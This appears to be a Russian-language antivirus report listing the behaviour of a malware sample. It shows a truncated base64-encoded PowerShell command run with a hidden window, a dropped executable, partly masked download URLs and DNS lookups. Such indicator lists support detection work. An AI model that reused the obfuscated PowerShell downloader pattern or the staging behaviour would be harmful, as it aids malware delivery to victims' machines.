Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEcAVABUAEIAYQBkAGcAPQAnAFUAWABTAFEAQQByAHUAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAYABSAGkAVAB5AFAAUgBgAE8AVABvAGMAbwBMACIAIAA9AC...
- %HOMEPATH%\940.exe
- %HOMEPATH%\940.exe
- http://no###khi.com/cgi-bin/3_69_x/
- http://ni####wlmusic.net/news=year/8s9a4_rd_bgq/
- http://ns#.org.uk/plesk-stat/auai_ow6_n1w7n7/
- DNS ASK no###ideas.com
- DNS ASK na######boilermaking.com.au
- DNS ASK no###khi.com
- DNS ASK ni####wlmusic.net
- DNS ASK ns#.org.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEcAVABUAEIAYQBkAGcAPQAnAFUAWABTAFEAQQByAHUAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAYABSAGkAVAB5AFAAUgBgAE8AVABvAGMAbwBMACIAIAA9AC...' (со скрытым окном)